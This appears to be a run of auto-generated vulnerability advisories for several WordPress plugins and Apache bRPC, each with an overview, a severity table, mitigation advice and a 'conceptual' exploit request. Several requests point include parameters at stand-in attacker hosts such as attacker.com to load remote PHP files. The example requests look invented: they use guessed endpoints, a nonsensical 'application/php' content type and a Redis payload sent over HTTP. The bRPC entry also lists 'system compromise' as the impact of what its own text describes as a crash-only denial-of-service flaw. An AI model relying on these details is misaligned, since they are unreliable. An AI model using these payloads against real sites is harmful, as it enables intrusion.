Author: Ameeba

Overview

This report outlines a critical vulnerability, CVE-2025-52716, in Acato WP REST Cache that impacts PHP applications. A PHP Remote File Inclusion issue allows for PHP Local File Inclusion, enabling potential attackers to compromise systems or leak data. Cybersecurity teams need to address this vulnerability promptly due to its severity and the potential damage it could cause.

Vulnerability Summary

CVE ID: CVE-2025-52716
Severity: High Risk (CVSS: 7.5)
Attack Vector: Remote
Privileges Required: None
User Interaction: None
Impact: Potential system compromise and data leakage

Affected Products

Product | Affected Versions

Acato WP REST Cache | Versions up to 2025.1.0

How the Exploit Works

The CVE-2025-52716 vulnerability arises from an improper control of filename for Include/Require Statement in a PHP Program. This flaw allows an attacker to manipulate the filename, leading to a PHP Remote File Inclusion. The attacker can potentially include malicious PHP files from remote servers, leading to PHP Local File Inclusion, thus taking control of the system or causing data leakage.

Conceptual Example Code

Below is a conceptual example of how the vulnerability might be exploited:

GET /wp-rest-cache/vulnerable.php?file=http://attacker.com/malicious.php HTTP/1.1
Host: target.example.com

In the example above, the attacker uses a GET request to include a malicious PHP file (`malicious.php`) hosted on their server (`attacker.com`) into the `vulnerable.php` script on the target server (`target.example.com`).

Mitigation Guidance

To mitigate this vulnerability, users are advised to apply patches provided by the vendor as soon as they are available. Until a permanent fix is available, users can use a Web Application Firewall (WAF) or Intrusion Detection System (IDS) as a temporary measure to block attempts to exploit this vulnerability.

Overview

The CVE-2025-49271 is a high-risk vulnerability that has been identified in GravityWP – Merge Tags, a popular WordPress plugin. The flaw lies in the inclusion of PHP files from remote servers, which can potentially lead to system compromise and data leakage. It is crucial for all users and administrators of affected versions of this plugin to take immediate action to mitigate the risk.

Vulnerability Summary

CVE ID: CVE-2025-49271
Severity: High (CVSS: 7.5)
Attack Vector: Remote
Privileges Required: Low
User Interaction: None
Impact: System compromise and potential data leakage

Affected Products

Product | Affected Versions

GravityWP – Merge Tags | n/a through 1.4.4

How the Exploit Works

The vulnerability arises from incorrect control of filename for include/require statement in PHP Program. This allows an attacker to manipulate the filesystem references and include PHP files from remote servers. As a result, an attacker could execute arbitrary PHP code on the server, leading to a complete system compromise.

Conceptual Example Code

This is a conceptual example of how the vulnerability might be exploited. The attacker sends a POST request with a malicious PHP file URL included in the request data.

POST /targeted-endpoint HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
path=http://malicious-site.com/malicious-file.php

In this scenario, the “path” parameter is improperly controlled, and thus the server ends up including and executing the remote “malicious-file.php”.

Recommended Mitigation

Users are advised to apply the vendor patch as soon as it is available to fix this vulnerability. In the meantime, employing a Web Application Firewall (WAF) or an Intrusion Detection System (IDS) can serve as a temporary mitigation measure by detecting and blocking attempts to exploit this vulnerability.

Overview

An identified vulnerability, CVE-2025-49264, in Cloud Infrastructure Services Cloud SAML SSO – Single Sign On Login, has been found to cause potential system compromise or data leakage. This is due to an improper control of the filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’). The vulnerability affects users of this service and is of significant concern due to the potential for malicious entities to gain unauthorized access.

Vulnerability Summary

CVE ID: CVE-2025-49264
Severity: High (7.5)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise and potential data leakage

Affected Products

Product | Affected Versions

Cloud SAML SSO – Single Sign On Login | n/a – 1.0.18

How the Exploit Works

The CVE-2025-49264 exploit involves a PHP Remote File Inclusion (RFI) vulnerability, which occurs when an application uses user input to construct a file path for file operations. An attacker can manipulate the input to point to an arbitrary remote file which will be downloaded and executed by the application. This allows an attacker to execute arbitrary code on the system.

Conceptual Example Code

Here’s a conceptual example of how an attacker might exploit this vulnerability:

GET /vulnerable.php?file=http://attacker.com/malicious_file.php HTTP/1.1
Host: target.example.com

In this example, the attacker is able to load `malicious_file.php` from their server by manipulating the `file` parameter in the GET request. This remote file could contain code that would be executed by the server, possibly leading to unauthorized access or data leakage.

Overview

CVE-2025-48332 is a significant vulnerability that affects the PublishPress Gutenberg Blocks in PHP programs. This flaw is due to an improper control of filename for Include/Require Statement, which can allow an attacker to include PHP local files. This vulnerability could potentially lead to system compromise or data leakage, thus posing a significant risk to any platform using affected versions of PublishPress Gutenberg Blocks.

Vulnerability Summary

CVE ID: CVE-2025-48332
Severity: High (7.5 – CVSS Severity Score)
Attack Vector: Network
Privileges Required: None
User Interaction: Required
Impact: Potential system compromise or data leakage

Affected Products

Product | Affected Versions

PublishPress Gutenberg Blocks | n/a through 3.3.1

How the Exploit Works

The vulnerability arises from the improper control of filename for Include/Require Statement in the PHP program. This oversight allows an attacker to exploit the PHP Remote File Inclusion (RFI) vulnerability in the PublishPress Gutenberg Blocks. The attacker can craft malicious PHP files and trick the program into including them. This could grant the attacker unauthorized access to potentially sensitive data or even lead to a full system compromise.

Conceptual Example Code

Below is a conceptual example of how the vulnerability might be exploited. In this example, the attacker sends a POST request to the vulnerable endpoint, including a malicious payload in the request body.

POST /vulnerable/endpoint HTTP/1.1
Host: target.example.com
Content-Type: application/php
{ "filename": "http://malicious.example.com/malicious_file.php" }

In this hypothetical attack, the PHP program would include and execute the malicious_file.php from the attacker’s server, leading to the potential compromise of the system.

Mitigation

Users are strongly advised to apply the patch provided by the vendor as soon as possible. Until the patch is applied, using a Web Application Firewall (WAF) or an Intrusion Detection System (IDS) can provide temporary mitigation.

Overview

The vulnerability identified as CVE-2025-3703 is a serious cybersecurity threat that affects the CSS & JavaScript Toolbox provided by wipeoutmedia. This flaw is related to the improper control of filename in PHP programs, which can be exploited to allow PHP Local File Inclusion. This vulnerability is significant because it may potentially lead to system compromise or data leakage if successfully exploited.

Vulnerability Summary

CVE ID: CVE-2025-3703
Severity: High (7.5 CVSS)
Attack Vector: Remote
Privileges Required: Low
User Interaction: None
Impact: System compromise and potential data leakage

Affected Products

Product | Affected Versions

wipeoutmedia CSS & JavaScript Toolbox | All versions till the issue was discovered

How the Exploit Works

The vulnerability is caused by an improper control of filename for include/require statement in PHP programs within the CSS & JavaScript Toolbox. An attacker can exploit this vulnerability by injecting a malicious PHP file into the include/require statement, leading to PHP Local File Inclusion. This allows the attacker to execute malicious scripts on the server, potentially leading to system compromise or data leakage.

Conceptual Example Code

Below is a conceptual example of how the vulnerability might be exploited:

POST /vulnerable/endpoint.php HTTP/1.1
Host: target.example.com
Content-Type: application/x-www-form-urlencoded
include_file=http://attacker.com/malicious_file.php

In the above example, the attacker sends a POST request to a vulnerable endpoint on the target server. The ‘include_file’ parameter is set to a remote URL hosting the malicious PHP file. Once the request is processed by the server, the malicious PHP file is included and executed, potentially compromising the system.

Overview

The vulnerability identified as CVE-2025-32288 is a critical security flaw that impacts stmcan RT-Theme 18 Extensions. It involves an Improper Control of Filename for Include/Require Statement in PHP Program, commonly known as PHP Remote File Inclusion. The flaw is of significant concern as it opens a potential gateway for system compromise and data leakage.

Vulnerability Summary

CVE ID: CVE-2025-32288
Severity: High (7.5)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise or data leakage

Affected Products

Product | Affected Versions

stmcan RT-Theme 18 | Extensions: n/a – 2.4

How the Exploit Works

The vulnerability stems from the improper control of filenames for the include/require statement in the PHP program. An attacker can manipulate the filesystem references in PHP applications, causing the application to include a remote file that contains malicious code. This file executes on the server, offering the attacker a chance to compromise the system or leak data.

Conceptual Example Code

Here is a
conceptual
example of how the vulnerability might be exploited:

GET /index.php?file=http://attacker.com/malicious_file.txt HTTP/1.1
Host: vulnerablewebsite.com

In this example, the attacker manipulates the “file” parameter to include a remote file (malicious_file.txt) hosted on their server (attacker.com). When the request is processed, the server fetches and executes the malicious code contained in malicious_file.txt.

Mitigation

It is advised to apply the vendor-provided patch as soon as possible. In the interim, a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can be used to mitigate the risk by identifying and blocking attempts to exploit this vulnerability.

Overview

The vulnerability identified as CVE-2025-31425 pertains to a Missing Authorization flaw, discovered in a WordPress plugin called WP Lead Capturing Pages. The impact of this vulnerability is significant, potentially leading to system compromise or data leakage. This issue affects a broad range of users, primarily website owners and administrators who utilize this plugin for lead capture purposes.

Vulnerability Summary

CVE ID: CVE-2025-31425
Severity: High (7.5 CVSS v3)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise or data leakage

Affected Products

Product | Affected Versions

WP Lead Capturing Pages | Up to 2.3

How the Exploit Works

The exploit takes advantage of a flaw in the plugin’s access control configuration. An attacker could send specially crafted requests to the plugin’s functions that are supposed to be restricted to authorized users only. Due to the flaw, the plugin fails to properly validate the user’s authorization, allowing the attacker to perform actions they should not be permitted to execute.

Conceptual Example Code

Here is a conceptual example of how this vulnerability might be exploited:

POST /wp-lead-capturing-pages/function HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/json
{ "malicious_payload": "Exploit Code" }

In this example, the attacker sends a POST request to a restricted function of the plugin. The malicious payload (“Exploit Code”) is executed because the plugin fails to properly check the user’s authorization level.

Mitigation

Website owners and administrators are advised to apply the latest patches provided by the vendor as soon as they become available. In the meantime, it’s recommended to use Web Application Firewalls (WAF) or Intrusion Detection Systems (IDS) as temporary mitigation methods.

Overview

The CVE-2025-30639 vulnerability pertains to a Missing Authorization issue in the IDonatePro software by ThemeAtelier. This vulnerability can lead to potential system compromise or data leakage due to incorrectly configured access control security levels. It affects all IDonatePro versions up to 2.1.9.

Vulnerability Summary

CVE ID: CVE-2025-30639
Severity: High (CVSS: 7.5)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise and potential data leakage

Affected Products

Product | Affected Versions

ThemeAtelier IDonatePro | Up to 2.1.9

How the Exploit Works

The exploit takes advantage of the lack of proper authorization checks in IDonatePro. An attacker can bypass the security controls and gain unauthorized access to the system. Once the attacker has access, they can manipulate the data or system processes, leading to system compromise and potential data leakage.

Conceptual Example Code

This is a conceptual example of how the vulnerability might be exploited. In this case, an attacker sends a malicious HTTP request to the vulnerable endpoint:

POST /idonatepro/access HTTP/1.1
Host: target.example.com
Content-Type: application/json
{ "admin_override": "true" }

In the above example, the attacker is trying to gain unauthorized access by sending a POST request with a malicious payload that attempts to override the admin privileges.

Mitigation and Prevention

To prevent exploitation of this vulnerability, users should apply the vendor patch as soon as it is available. In the interim, using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can help to mitigate the risk. Regular updates and security audits are also recommended to keep the system secure.

Overview

The vulnerability CVE-2025-24766 is a critical flaw impacting WP Royal Themes News Magazine X, a widely used WordPress theme. The vulnerability stems from an improper control of filename for Include/Require Statement in PHP Program (PHP Remote File Inclusion). If successfully exploited, it could potentially lead to system compromise or data leakage.

Vulnerability Summary

CVE ID: CVE-2025-24766
Severity: High (CVSS: 7.5)
Attack Vector: Network
Privileges Required: Low
User Interaction: Required
Impact: System compromise and potential data leakage

Affected Products

Product | Affected Versions

WP Royal Themes News Magazine X | n/a – 1.2.37

How the Exploit Works

The vulnerability lies in the improper handling of filenames in PHP Include/Require statements. This makes it possible for an attacker to include files from remote servers, and execute arbitrary PHP code or reveal sensitive information. This is known as a PHP Remote File Inclusion (RFI) exploit.

Conceptual Example Code

An attacker could exploit this vulnerability by sending a specially crafted request to the server. This could look something like the following:

GET /index.php?page=http://maliciouswebsite.com/maliciousfile.txt HTTP/1.1
Host: target.example.com

In this example, the `page` parameter is manipulated to include a file from a remote server (`maliciouswebsite.com`). This file (`maliciousfile.txt`) could contain arbitrary PHP code, which would be executed by the server.

Mitigation

To mitigate this vulnerability, users should apply the patch provided by the vendor as soon as possible. As a temporary measure, users could also implement a Web Application Firewall (WAF) or Intrusion Detection System (IDS) to block attempts to exploit this vulnerability.

Overview

This report discusses the CVE-2025-54472 vulnerability, a severe flaw found in all versions of Apache bRPC before 1.14.1. This vulnerability allows attackers to cause a denial-of-service attack by crashing the service. It notably affects those using bRPC as a Redis server to provide network services to untrusted clients or using bRPC as a Redis client to call untrusted Redis services. The severity of this vulnerability underscores the need for immediate remediation.

Vulnerability Summary

CVE ID: CVE-2025-54472
Severity: High (CVSS: 7.5)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: Potential system compromise or data leakage

Affected Products

Product | Affected Versions

Apache bRPC | < 1.14.1 How the Exploit Works

The vulnerability lies within the bRPC Redis protocol parser code, which allocates memory for arrays or strings based on integers read from the network. If an unusually large integer is read, it may trigger a bad alloc error, leading to a program crash. An attacker can manipulate this weakness by sending specially crafted data packets to the bRPC service, instigating a denial-of-service attack. The 1.14.0 version attempted a fix by limiting memory allocation size, but due to an integer overflow in the limit checking code, this version remains vulnerable.

Conceptual Example Code

While this is not real code, it serves as a conceptual example of how the vulnerability might be exploited, by sending a large size value (e.g., 9999999999) as part of a Redis command:

POST /brpc/redis/command HTTP/1.1
Host: target.example.com
Content-Type: application/redis
*3\r\n$3\r\nSET\r\n$10\r\nmykey\r\n$9999999999\r\nmyvalue\r\n

The above example would cause the server to attempt to allocate an exorbitant amount of memory, leading to a crash.

Possible Mitigations

Two primary mitigation steps are recommended:
1. Upgrade Apache bRPC to version 1.14.1. This latest version includes a patch that addresses the vulnerability.
2. Alternatively, apply the patch manually as provided here: https://github.com/apache/brpc/pull/3050.
In either case, the patch limits the maximum length of memory allocated each time in the bRPC Redis parser to a default of 64MB. If your Redis request or response exceeds this size, you might encounter an error after the upgrade. Adjust the `redis_max_allocation_size` gflag to a larger limit if necessary.
As a temporary solution, using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can help prevent exploitation of this vulnerability.